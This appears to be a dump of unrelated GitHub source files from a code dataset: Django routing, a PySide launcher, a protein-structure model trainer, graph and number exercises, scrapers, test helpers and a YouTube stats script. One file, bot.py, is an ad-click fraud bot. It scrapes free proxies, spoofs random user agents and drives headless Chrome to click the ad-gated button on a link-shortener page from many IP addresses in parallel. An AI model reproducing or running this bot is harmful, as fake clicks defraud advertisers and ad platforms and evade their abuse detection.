include('home.urls')),\n]\n","repo_name":"PDXDevCampJuly/michael_devCamp","sub_path":"django/html_portfolio/html_portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72284033106","text":"# from PyQt6 import QtWidgets\n# from PyQt6.QtWidgets import QApplication, QMainWindow\n# import sys\n#\n# from controlPanel2 import Ui_MainWindow\n#\n#\n# def window():\n# app = QApplication(sys.argv)\n# win = QMainWindow()\n# win.setGeometry(330,222,300,300)\n# win.setWindowTitle(\"start\")\n#\n# pushButton = QtWidgets.QPushButton(win)\n# pushButton.setGeometry(72, 127, 111, 221)\n# pushButton.sizeHint()\n# pushButton.setObjectName(\"pushButton\")\n#\n# win.show()\n# sys.exit(app.exec())\n#\n# # window()\n# # print(\"test\")\nfrom PySide6 import QtWidgets\n\nfrom controlPanel2 import Ui_MainWindow\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","repo_name":"czogran/rys","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7835594502","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 16 18:41:38 2020\n\n@author: xugang\n\n\"\"\"\nimport time\nfrom my_model import Model\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow import keras\nfrom utils import InputReader, cal_accurarcy\n\nif __name__ == '__main__':\n \n #parameters of training\n batch_size = 4\n epochs = 40\n early_stop = 4\n input_normalization = True\n learning_rate = 1e-3\n \n params = {}\n params[\"d_input\"] = 76\n params[\"d_ss8_output\"] = 8\n params[\"d_ss3_output\"] = 3\n params[\"d_phipsi_output\"] = 4\n params[\"d_csf_output\"] = 3\n params[\"d_asa_output\"] = 1\n params[\"d_rota_output\"] = 8\n params[\"dropout_rate\"] = 0.25\n \n #parameters of transfomer model\n params[\"transfomer_layers\"] = 2\n params[\"transfomer_num_heads\"] = 4\n \n #parameters of birnn model\n params[\"lstm_layers\"] = 4\n params[\"lstm_units\"] = 1024\n \n #parameters of cnn model\n params[\"cnn_layers\"] = 5\n params[\"cnn_channels\"] = 32\n \n params[\"save_path\"] = r'./models'\n \n gpus = tf.config.experimental.list_physical_devices('GPU')\n tf.config.experimental.set_visible_devices(gpus[0], 'GPU')\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), len(logical_gpus))\n\n train_list_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/list_train\"\n val_list_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/list_val\"\n test_list_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/list_test2016\"\n \n inputs_files_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/inputs\"\n labels_files_path = \"/data/xugang/opus_contact/SPOT-1D/dataset/SPOT-1D-dataset/opus_dataset/clean/labels\" \n \n model_c5 = Model(params=params, name=\"c5\")\n \n train_reader = InputReader(data_list=train_list_path,\n inputs_files_path=inputs_files_path,\n labels_files_path=labels_files_path,\n num_batch_size=batch_size,\n input_norm=input_normalization, \n shuffle=True,\n data_enhance=True)\n \n val_reader = InputReader(data_list=val_list_path,\n 
inputs_files_path=inputs_files_path,\n labels_files_path=labels_files_path,\n num_batch_size=batch_size,\n input_norm=input_normalization, \n shuffle=False,\n data_enhance=False)\n \n test_reader = InputReader(data_list=test_list_path,\n inputs_files_path=inputs_files_path,\n labels_files_path=labels_files_path,\n num_batch_size=batch_size,\n input_norm=input_normalization, \n shuffle=False,\n data_enhance=False)\n \n lr = tf.Variable(tf.constant(learning_rate), name='lr', trainable=False)\n optimizer = keras.optimizers.Adam(lr=lr)\n\n def train_step(x, x_mask, y, y_mask):\n \n ss8_predictions = ss3_predictions = phipsi_predictions = \\\n csf_predictions = asa_predictions = rota_predictions = None\n\n with tf.GradientTape() as tape:\n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions, loss = \\\n model_c5.inference(x, x_mask, y, y_mask, training=True) \n \n trainable_variables = model_c5.transformer.trainable_variables + \\\n model_c5.cnn.trainable_variables + model_c5.birnn.trainable_variables\n gradients = tape.gradient(loss, trainable_variables)\n optimizer.apply_gradients(\n zip(gradients, trainable_variables))\n \n return loss, ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions\n\n def infer_step(x, x_mask):\n \n ss8_predictions = ss3_predictions = phipsi_predictions = \\\n csf_predictions = asa_predictions = rota_predictions = None\n \n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions, _ = \\\n model_c5.inference(x, x_mask, y, y_mask, training=False)\n \n return ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions\n \n best_val_acc = 0\n for epoch in range(epochs):\n \n #======================Train======================\n accuracy_train_ss8 = []\n accuracy_train_ss3 = []\n accuracy_train_phi = []\n accuracy_train_psi = []\n for step, filenames_batch in enumerate(train_reader.dataset):\n start_time = time.time()\n # x (batch, max_len, 76)\n # x_mask (batch, max_len)\n # encoder_padding_mask (batch, 1, 1, max_len)\n # y (batch, max_len, 30)\n # y_mask (batch, max_len, 30)\n filenames, x, x_mask, y, y_mask, inputs_total_len, labels_total_len = \\\n train_reader.read_file_from_disk(filenames_batch)\n \n assert inputs_total_len == labels_total_len\n\n loss, ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions = \\\n train_step(x, x_mask, y, y_mask)\n \n accuracy_train_ss8.extend(\n cal_accurarcy(\"SS8\", ss8_predictions, y, y_mask, total_len=inputs_total_len))\n \n accuracy_train_ss3.extend(\n cal_accurarcy(\"SS3\", ss3_predictions, y, y_mask, total_len=inputs_total_len))\n \n mae_phi, mae_psi = cal_accurarcy(\"PhiPsi\", phipsi_predictions, y, y_mask, total_len=inputs_total_len)\n accuracy_train_phi.extend(mae_phi)\n accuracy_train_psi.extend(mae_psi)\n \n run_time = time.time() - start_time\n \n if step % 10 == 0:\n print('Epoch: %d, step: %d, loss: %3.3f, acc8: %3.4f, acc3: %3.4f, phi: %3.2f, psi: %3.2f, time: %3.3f'\n % (epoch, step, loss, np.mean(accuracy_train_ss8), np.mean(accuracy_train_ss3), \n np.mean(accuracy_train_phi), np.mean(accuracy_train_psi), run_time)) \n\n #======================Val======================\n accuracy_val_ss8 = []\n accuracy_val_ss3 = []\n accuracy_val_phi = []\n accuracy_val_psi = []\n start_time = time.time()\n for step, filenames_batch in 
enumerate(val_reader.dataset):\n \n filenames, x, x_mask, y, y_mask, inputs_total_len, labels_total_len = \\\n val_reader.read_file_from_disk(filenames_batch)\n \n assert inputs_total_len == labels_total_len\n\n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions = \\\n infer_step(x, x_mask)\n \n accuracy_val_ss8.extend(\n cal_accurarcy(\"SS8\", ss8_predictions, y, y_mask, total_len=inputs_total_len))\n\n accuracy_val_ss3.extend(\n cal_accurarcy(\"SS3\", ss3_predictions, y, y_mask, total_len=inputs_total_len))\n\n mae_phi, mae_psi = cal_accurarcy(\"PhiPsi\", phipsi_predictions, y, y_mask, total_len=inputs_total_len)\n accuracy_val_phi.extend(mae_phi)\n accuracy_val_psi.extend(mae_psi)\n \n run_time = time.time() - start_time\n print('Epoch: %d, lr: %s, acc8: %3.4f, acc3: %3.4f, phi: %3.2f, psi: %3.2f, time: %3.3f'\n % (epoch, str(lr.numpy()), np.mean(accuracy_val_ss8), np.mean(accuracy_val_ss3), \n np.mean(accuracy_val_phi), np.mean(accuracy_val_psi), run_time)) \n \n if np.mean(accuracy_val_ss8) > best_val_acc:\n best_val_acc = np.mean(accuracy_val_ss8)\n model_c5.save_model()\n else:\n lr.assign(lr/2)\n early_stop -= 1\n \n if early_stop == 0:\n break\n \n print (\"best_val_acc:\", best_val_acc)\n \n #======================Test======================\n\n model_c5_test = Model(params=params, name=\"c5\")\n model_c5_test.load_model()\n \n def test_infer_step(x, x_mask):\n\n ss8_predictions = ss3_predictions = phipsi_predictions = \\\n csf_predictions = asa_predictions = rota_predictions = None\n \n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions, _ = \\\n model_c5_test.inference(x, x_mask, y, y_mask, training=False)\n \n return ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions\n \n accuracy_test_ss8 = []\n accuracy_test_ss3 = []\n accuracy_test_phi = []\n accuracy_test_psi = []\n start_time = time.time()\n for step, filenames_batch in enumerate(test_reader.dataset):\n \n filenames, x, x_mask, y, y_mask, inputs_total_len, labels_total_len = \\\n test_reader.read_file_from_disk(filenames_batch)\n \n assert inputs_total_len == labels_total_len\n\n ss8_predictions, ss3_predictions, phipsi_predictions, \\\n csf_predictions, asa_predictions, rota_predictions = \\\n test_infer_step(x, x_mask)\n\n accuracy_test_ss8.extend(\n cal_accurarcy(\"SS8\", ss8_predictions, y, y_mask, total_len=inputs_total_len))\n\n accuracy_test_ss3.extend(\n cal_accurarcy(\"SS3\", ss3_predictions, y, y_mask, total_len=inputs_total_len))\n\n mae_phi, mae_psi = cal_accurarcy(\"PhiPsi\", phipsi_predictions, y, y_mask, total_len=inputs_total_len)\n accuracy_test_phi.extend(mae_phi)\n accuracy_test_psi.extend(mae_psi)\n \n run_time = time.time() - start_time\n print('Acc8: %3.4f, Acc3: %3.4f, Phi: %3.2f, Psi: %3.2f, time: %3.3f'\n % (np.mean(accuracy_test_ss8), np.mean(accuracy_test_ss3), \n np.mean(accuracy_test_phi), np.mean(accuracy_test_psi), run_time)) \n","repo_name":"thuxugang/opus_tass","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10500,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"37267697023","text":"import networkx as nx\nimport pylab as P\nimport matplotlib.pyplot as plt\ndef dijkstra(graph,src,dest,visited=None,distances=None,predecessors=None):\n # mutable default arguments are shared between calls, so the containers\n # are created per call instead\n if visited is None:\n visited = []\n if distances is None:\n distances = {}\n if predecessors is None:\n predecessors = {}\n if src == dest:\n # build the shortest path and print it\n path=[]\n pred=dest\n while pred is not None:\n path.append(pred)\n pred=predecessors.get(pred,None)\n print('shortest path: '+str(path)+\" cost=\"+str(distances[dest])) \n else : \n \n if not visited: \n distances[src]=0\n for neighbor in graph[src] :\n if neighbor not in visited:\n new_distance = distances[src] + graph[src][neighbor]\n if new_distance < distances.get(neighbor,float('inf')):\n distances[neighbor] = new_distance\n predecessors[neighbor] = src\n\n visited.append(src)\n\n unvisited={}\n for k in graph:\n if k not in visited:\n unvisited[k] = distances.get(k,float('inf')) \n x=min(unvisited, key=unvisited.get)\n dijkstra(graph,x,dest,visited,distances,predecessors)\n 
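\n# (added note, illustrative) with the sample graph under __main__ below,\n# dijkstra(graph, 's', 't') should print: shortest path: ['t', 'd', 'b', 's'] cost=8\n# (the cheapest route is s -> b -> d -> t, with edge costs 1 + 2 + 5).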
\n\nif __name__ == \"__main__\":\n graph = {'s': {'a': 2, 'b': 1},\n 'a': {'s': 3, 'b': 4, 'c':8},\n 'b': {'s': 4, 'a': 2, 'd': 2},\n 'c': {'a': 2, 'd': 7, 't': 4},\n 'd': {'b': 1, 'c': 11, 't': 5},\n 't': {'c': 3, 'd': 5}}\n #dijkstra(graph,'c','b')\n \n \n print(\"-------------------------------\")\n G=nx.Graph()\n G.add_nodes_from(['a','b','c','d','s','t'])\n G.add_weighted_edges_from([('s','b',1),('s','a',2),('a','s',3),('a','b',4),('a','c',8),('b','s',4),('b','a',2),('b','d',2),\n ('c','a',2),('c','d',7),('c','t',4),\n ('d','b',1),('d','c',11),('d','t',5),('t','c',3),('t','d',5)])\n \n l = nx.dijkstra_path(G,'b','t')\n \n\n for p in G.edges():\n G[p[0]][p[1]]['color'] = 'black'\n # colour the edges on the shortest path\n for i in range(len(l)-1):\n G[l[i]][l[i+1]]['color'] = 'blue'\n # Store in a list to use for drawing\n edge_color_list = [ G[p[0]][p[1]]['color'] for p in G.edges() ]\n nx.draw(G,edge_color = edge_color_list, with_labels = True)\n\n","repo_name":"IHDINA/Theory-Graphes","sub_path":"Djikstra_Path.py","file_name":"Djikstra_Path.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74172041104","text":"#coding=utf-8\n#author:Kingving time:2020/6/17 1:27\n\"\"\"\n1. A 3-digit number that equals the sum of the cubes of its digits is called a\nnarcissistic number. For example: 153 = 1^3 + 5^3 + 3^3, so 153 is one.\nProblem: find all 3-digit narcissistic numbers below 1000.\n\"\"\"\n\n\n# List the narcissistic numbers\n# for num in range(100, 1000):\n# ge_num = num % 10 # ones digit\n# bai_num = num // 100 # hundreds digit\n# shi_num = (num - bai_num * 100 - ge_num) // 10 # tens digit\n# if ge_num ** 3 + shi_num ** 3 + bai_num ** 3 == num:\n# print (num)\n#\n#\n# # Check whether a given number is narcissistic\n# num = int(input('Enter a three-digit number'))\n# ge_num = num % 10\n# bai_num = num // 100\n# shi_num = (num - bai_num * 100 - ge_num) // 10\n# if ge_num ** 3 + shi_num ** 3 + bai_num ** 3 == num:\n# print ('%d is a narcissistic number' % num)\n#\n# else:\n# print ('%d is not a narcissistic number' % num)\n#\n\n# Concise approach: sum the cubed digits with a comprehension\nfor i in range(100,1000):\n s=sum(int(j)**3 for j in str(i))\n if s==i:\n print(i)\n\n\n# Generalised approach: Armstrong numbers with any digit count\nfor i in range(100,10000):\n s=sum([int(j)**len(str(i)) for j in str(i)])\n if s==i:\n print(i)","repo_name":"kakashi-01/python-0504","sub_path":"shanghaiyouyou/题库/水仙花.py","file_name":"水仙花.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72674088787","text":"#pylint:disable=C0103\n#pylint:disable=W0622\n#pylint:disable=W0611\n#pylint:disable=W0404\nimport os\nimport time\nimport random\n\n\n# For MultiProcess\nfrom multiprocessing.dummy import Pool\n\n# Logging and Arg\nfrom sys import exit, argv\nimport logging\nimport requests\nimport urllib.parse\nimport time\nfrom datetime import datetime\n\n\n# py_proxy\n#from proxy import Proxy\n\n# Import selenium modules\nfrom selenium import webdriver\n\n# For Element Selection\nfrom selenium.webdriver.common.by import By\n\n# For Waiting for Elements\nfrom 
selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n# User Agent\n\n\nfrom fake_useragent import UserAgent\n\n\n# For Proxy Grabber\nfrom bs4 import BeautifulSoup\nimport requests\nimport lxml\n\n\n\n# Data and Variables Here\n\ndriver_path = os.environ.get('CHROMEDRIVER_PATH')\nbinary_path = os.environ.get('GOOGLE_CHROME_BIN')\ndriver_UA = \"\"\"Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6\"\"\"\n\n# Configs Here\nthread_count = int(os.getenv(\"THREAD_COUNT\", 4)) # env vars are strings; Pool wants an int\npage_url = os.getenv(\"PAGE_URL\",\"https://za.gl/\")\n\n# page_urls = os.environ.get(\"PAGE_URLS\")\n# urls_file = os.environ.get(\"URLS_FILE\")\n# if page_urls==None:\n# if not \"http\" in urls_file:\n# if os.path.exists(\"./\" + urls_file):\n# page_urls = open(\"./\" + urls_file, \"r\").read()\n# else:\n# r = requests.get(urls_file)\n# page_urls = r.text()\n\n\n\n\ndef adress_proxy():\n target_url = 'https://www.ip-adress.com/proxy-list'\n result = requests.get(target_url)\n soup = BeautifulSoup(result.text, \"lxml\")\n pars_result = soup.find('tbody').find_all('tr')\n proxy_list = []\n for elem in pars_result:\n elem = elem.get_text().split()[:2]\n if elem[1] != 'transparent':\n proxy_list.append(elem[0])\n return proxy_list\n\ndef check_proxy(proxy):\n proxy = 'http://' + proxy\n time.sleep(1)\n try:\n result = requests.get('http://ip-api.com/json', proxies={'http': proxy}, timeout=2)\n if result.status_code == 200:\n try:\n if result.json()['status'] == 'success':\n return True\n except IndexError:\n return False\n else:\n return False\n except requests.exceptions.ConnectionError:\n return False\n except requests.exceptions.ReadTimeout:\n return False\n except requests.exceptions.ChunkedEncodingError:\n return False\n except requests.exceptions.TooManyRedirects:\n return False\n\n\n\ndef click_adds(page_url, proxy, driver_UA):\n # Create a Proxy Config\n time.sleep(random.choice(range(20,2000)))\n print(\"[#] Using New Proxy: \" + proxy)\n options = webdriver.ChromeOptions()\n options.binary_location = binary_path\n options.add_argument('headless')\n options.add_argument('--proxy-server=' + proxy)\n options.add_argument(\"user-agent=\" + driver_UA)\n options.add_argument('--disable-gpu')\n options.add_argument('--no-sandbox')\n options.add_argument(\"--blink-settings=imagesEnabled=false\")\n #options.add_argument(\"default_content_settings.images=2\")\n options.add_argument('--disable-logging')\n desired_cap = options.to_capabilities()\n # Load Page\n print(\"[#] Loading Page...\")\n pbrowser = webdriver.Chrome(executable_path=driver_path,desired_capabilities=desired_cap,service_log_path=\"chromedriver_logs.log\")\n #pbrowser.maximize_window()\n pbrowser.get(page_url)\n print(\"[#] Success... \"+\"\\n\"+\"[i] Page Title: \"+ pbrowser.title )\n sleep_timer = random.choice(range(2,20))\n print(f'[#] Waiting {sleep_timer} seconds')\n time.sleep(sleep_timer)\n try:\n print(\"[#] Searching Button...\")\n # By.CLASS_NAME takes a single class name, so match the compound\n # class list with a CSS selector instead\n button = WebDriverWait(pbrowser, 120).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \".btn.btn-success.btn-lg.get-link\")))\n print(\"[#] Clicking Button...\")\n button.click()\n # EC.url_changes needs the URL to compare against\n WebDriverWait(pbrowser, 20).until(EC.url_changes(page_url))\n print(\"[#] Click Ok...\")\n except Exception as e:\n print(\"[!] Error in Clicking Button: \" + str(e))\n pbrowser.quit()\n
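\n# (added note) Pool.map feeds its function one item from a single iterable;\n# click_adds takes three arguments, so main() bundles (page_url, proxy,\n# user_agent) tuples and fans them out with starmap, e.g.\n# pool.starmap(click_adds, [(url, p, ua) for p in proxies]).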
\n\n\n\ndef main():\n \"\"\"\n Program\n \"\"\"\n print(\"[#] Starting...\")\n print(\"[#] Fetching Proxies...\")\n proxy_list = adress_proxy()\n working_proxies = []\n for proxy in proxy_list:\n if check_proxy(proxy):\n working_proxies.append(proxy)\n print(\"[#] Found \" + str(len(working_proxies)) + \" working proxies.\")\n ua = UserAgent()\n # bundle the per-call arguments: Pool.map cannot take several iterables\n jobs = [(page_url, proxy, ua.random) for proxy in working_proxies]\n with Pool(thread_count) as worker:\n print(\"[#] Starting Click Bots on \" + str(len(jobs)) + \" proxies...\")\n worker.starmap(click_adds, jobs)\n # OK\n","repo_name":"default-github-user/AdClicker","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7581602073","text":"import re\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\"\"\"URL = \"https://meteoprog.pl/pl/weather/Zabki/\"\n\nhtml_site = requests.get(URL)\nhtml_site = html_site.text\n\nsoup = BeautifulSoup(html_site, \"html.parser\")\n\ntemp = soup('div', class_=\"icon-weather\")\ntemp = temp[0]\nweather_general = temp['title']\n\nprint(f\"General weather forecast: {weather_general}\")\n\ntemp_val = soup('div', class_=\"temp\")\ntemp_0 = temp_val[0]\ntemp_today = temp_0.get_text()\ntemp_final = str(temp_today).strip()\n\nprint(f\"Average temperature today will be: {temp_final}\")\n\ntemp_feel = soup('div', class_=\"someTemp\")\ntemp_feel0 = temp_feel[0].get_text()\ntemp_feel_final = str(temp_feel0).strip()\n\nprint(f\"Temperature you will feel will be: {temp_feel0}\")\"\"\"\n\n\nURL = \"https://pogoda.interia.pl/prognoza-dlugoterminowa-zabki,cId,39837\"\n\nhtml_doc = requests.get(URL)\nhtml_doc2 = html_doc.text\n\nsoup = BeautifulSoup(html_doc2, \"html.parser\")\nweather_all = soup('div', class_=\"weather-forecast-longterm-list-entry\")\n\nweather_today = weather_all[0]\ntoday_day = weather_today('span', class_=\"day\")[0].get_text()\ntoday_date = weather_today('span', class_=\"date\")[0].get_text()\n\nprint(f\"{today_day}, {today_date}\")\n\ndata_today = weather_today.find('div', class_=re.compile(\"top\")) # Match by a fragment of the class name.\nmax_temp = data_today.find('span', class_=re.compile(\"temp\")).get_text()\nmin_temp = data_today.find('span', class_=re.compile(\"lowtemp\")).get_text()\nclouds = data_today.find('span', class_=re.compile(\"phrase\")).get_text()\n\nprint(f\"Max day temperature: {max_temp}, Lowest day temperature: {min_temp}, and sky forecast is: {clouds}\")\n\n\n","repo_name":"elenerandarill/PogodaScrapp","sub_path":"PogodaScrapp.py","file_name":"PogodaScrapp.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19647042871","text":"from __future__ import annotations\n\nimport asyncio\nfrom typing import Optional, Union\n\nfrom ..helpers import MockSocket\n\n\nclass MockSSLObject:\n def selected_alpn_protocol(self) -> str:\n return \"h2\"\n\n\nclass MemoryReader:\n def __init__(self) -> None:\n self.data: asyncio.Queue = asyncio.Queue()\n self.eof = False\n\n async def send(self, data: bytes) -> None:\n if data != b\"\":\n await self.data.put(data)\n\n async def read(self, length: int) -> bytes:\n return await self.data.get()\n\n def 
close(self) -> None:\n self.data.put_nowait(b\"\")\n self.eof = True\n\n def at_eof(self) -> bool:\n return self.eof and self.data.empty()\n\n\nclass MemoryWriter:\n def __init__(self, http2: bool = False) -> None:\n self.is_closed = False\n self.data: asyncio.Queue = asyncio.Queue()\n self.http2 = http2\n\n def get_extra_info(self, name: str) -> Optional[Union[MockSocket, MockSSLObject]]:\n if name == \"socket\":\n return MockSocket()\n elif self.http2 and name == \"ssl_object\":\n return MockSSLObject()\n else:\n return None\n\n def write_eof(self) -> None:\n self.data.put_nowait(b\"\")\n\n def write(self, data: bytes) -> None:\n if self.is_closed:\n raise ConnectionError()\n self.data.put_nowait(data)\n\n async def drain(self) -> None:\n pass\n\n def close(self) -> None:\n self.is_closed = True\n self.data.put_nowait(b\"\")\n\n async def wait_closed(self) -> None:\n pass\n\n async def receive(self) -> bytes:\n return await self.data.get()\n","repo_name":"pgjones/hypercorn","sub_path":"tests/asyncio/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":770,"dataset":"github-code","pt":"48"} +{"seq_id":"5221783366","text":"from typing import List, Tuple\nimport os\n\nimport numpy as np\nimport cv2\n\n\ndef load_file_names(path: str) -> List[str]:\n files = os.listdir(path)\n files = sorted(files, key=lambda x: int(x.split('.')[-2]))\n return files\n\n\ndef load_frames(path: str, files: List[str]) -> List[np.ndarray]:\n frames = []\n for f in files:\n frame = cv2.imread(os.path.join(path, f))\n frames.append(frame)\n return frames\n\n\ndef load_masks(path: str, files: List[str]) -> List[np.ndarray]:\n masks = []\n for f in files:\n mask = cv2.imread(os.path.join(path, f), cv2.IMREAD_GRAYSCALE)\n masks.append(mask)\n return masks\n\n\ndef load_data(frames_path: str, masks_path: str) -> Tuple[List[np.ndarray], List[np.ndarray], List[str]]:\n names = load_file_names(frames_path)\n return load_frames(frames_path, names), load_masks(masks_path, names), names\n\n\ndef save_frames(path: str, files: List[str], frames: List[np.ndarray]) -> None:\n if not os.path.exists(path):\n os.makedirs(path)\n\n for file, frame in zip(files, frames):\n file_path = os.path.join(path, file)\n cv2.imwrite(file_path, frame)\n\n\ndef resize(images: List[np.ndarray], h: int, w: int) -> List[np.ndarray]:\n return np.asarray([cv2.resize(img, (w, h)) for img in images])\n","repo_name":"Nazar96/RFGT","sub_path":"inpainter/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31727547791","text":"import os\nfrom dotenv import load_dotenv\nimport pandas as pd\n\nimport google_auth_oauthlib.flow\nimport googleapiclient.discovery\nimport googleapiclient.errors\n\n\ndef get_channel_stats(youtube, channel_ids):\n \n all_data = []\n \n request = youtube.channels().list(\n part=\"snippet,contentDetails,statistics\",\n id=channel_ids\n )\n \n response = request.execute()\n \n for item in response[\"items\"]:\n data = {'channelName': item[\"snippet\"][\"title\"],\n 'publishedDate': item[\"snippet\"][\"publishedAt\"],\n 'subscribers': item[\"statistics\"][\"subscriberCount\"],\n 'views': item[\"statistics\"][\"viewCount\"],\n 'totalVideos': item[\"statistics\"][\"videoCount\"],\n 'playlistId': item[\"contentDetails\"]['relatedPlaylists']['uploads']\n }\n \n all_data.append(data)\n \n 
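# (added note, values invented) each appended row is a flat dict such as\n # {'channelName': 'SomeChannel', 'subscribers': '1000', 'views': '50000',\n # 'totalVideos': '12', 'playlistId': 'UU...'}; the API reports counts as strings.\n 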
return pd.DataFrame(all_data)\n\ndef get_video_ids(youtube, playlist_id):\n \n video_ids = []\n \n request = youtube.playlistItems().list(\n part=\"snippet,contentDetails\",\n playlistId=playlist_id,\n maxResults = 50\n )\n \n response = request.execute()\n \n for item in response['items']:\n video_ids.append(item[\"contentDetails\"]['videoId'])\n \n next_page_token = response.get('nextPageToken')\n while next_page_token is not None:\n request = youtube.playlistItems().list(\n part=\"contentDetails\",\n playlistId=playlist_id,\n maxResults = 50,\n pageToken = next_page_token\n )\n response = request.execute()\n\n for item in response['items']:\n video_ids.append(item[\"contentDetails\"]['videoId'])\n \n next_page_token = response.get('nextPageToken')\n \n return video_ids\n \ndef get_video_details(youtube, video_ids):\n \n all_video_info = []\n \n for ids in video_ids:\n request = youtube.videos().list(\n part=\"snippet,contentDetails,statistics\",\n id=ids\n )\n response = request.execute()\n \n for video in response[\"items\"]:\n stats_to_keep = {'snippet': ['title', 'description', 'publishedAt', 'tags'],\n 'statistics': ['viewCount', 'likeCount', 'favoriteCount', 'commentCount'],\n 'contentDetails': ['duration', 'definition', 'caption']}\n \n video_info = {}\n video_info[\"video_id\"] = video[\"id\"]\n \n for k in stats_to_keep.keys():\n for v in stats_to_keep[k]:\n try:\n video_info[v] = video[k][v]\n except KeyError:\n # the field is absent for this video (e.g. no tags)\n video_info[v] = None\n \n all_video_info.append(video_info)\n \n return pd.DataFrame(all_video_info)\n\ndef main():\n # Load Environments\n api_service_name = \"youtube\"\n api_version = \"v3\"\n load_dotenv()\n \n # Set Configurations\n API_KEY = os.getenv(\"API_KEY\")\n channel_ids = 'UCuJyaxv7V-HK4_qQzNK_BXQ'\n youtube = googleapiclient.discovery.build(\n api_service_name, api_version, developerKey=API_KEY)\n\n # Get Channel Statistics\n channel_stats = get_channel_stats(youtube, channel_ids)\n playlist_id = channel_stats.playlistId.values[0]\n \n # Get Video Information\n video_ids = get_video_ids(youtube, playlist_id)\n all_video_info = get_video_details(youtube, video_ids)\n \n all_video_info.to_csv(\"data.csv\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Joanna-Khek/youtube_api","sub_path":"youtube-api.py","file_name":"youtube-api.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38266555890","text":"import copy\nimport math\nimport os\nimport random\nimport sys\nimport traceback\nimport shlex\nimport re\n\nimport modules.scripts as scripts\nimport gradio as gr\n\nfrom modules import sd_samplers\nfrom modules.processing import Processed, process_images\nfrom PIL import Image\nfrom modules.shared import opts, cmd_opts, state\n\n\ndef process_string_tag(tag):\n return tag\n\n\ndef process_int_tag(tag):\n return int(tag)\n\n\ndef process_float_tag(tag):\n return float(tag)\n\n\ndef process_boolean_tag(tag):\n return True if (tag == \"true\") else False\n\n\nprompt_tags = {\n \"sd_model\": None, # the Stable Diffusion checkpoint\n \"outpath_samples\": process_string_tag, # output path for samples\n \"outpath_grids\": process_string_tag, # output path for grids\n \"prompt_for_display\": process_string_tag, # prompt shown in the UI\n \"prompt\": process_string_tag, # prompt\n \"negative_prompt\": process_string_tag, # negative prompt\n \"styles\": process_string_tag, # styles\n \"seed\": process_int_tag, # seed\n \"subseed_strength\": process_float_tag, # subseed strength\n \"subseed\": process_int_tag, # subseed\n \"seed_resize_from_h\": process_int_tag, # seed resize from height\n \"seed_resize_from_w\": process_int_tag, # seed resize from width\n \"sampler_index\": process_int_tag, # sampler index\n \"sampler_name\": process_string_tag, # sampler name\n \"batch_size\": process_int_tag, # batch size\n \"n_iter\": process_int_tag, # number of iterations\n \"steps\": process_int_tag, # steps\n \"cfg_scale\": process_float_tag, # CFG scale\n \"width\": process_int_tag, # width\n \"height\": process_int_tag, # height\n \"restore_faces\": process_boolean_tag, # restore faces\n \"tiling\": process_boolean_tag, # tiling\n \"do_not_save_samples\": process_boolean_tag, # do not save samples\n \"do_not_save_grid\": process_boolean_tag # do not save the grid\n}\n\nooo = \"Black clothes, (black hair),\"\n\n
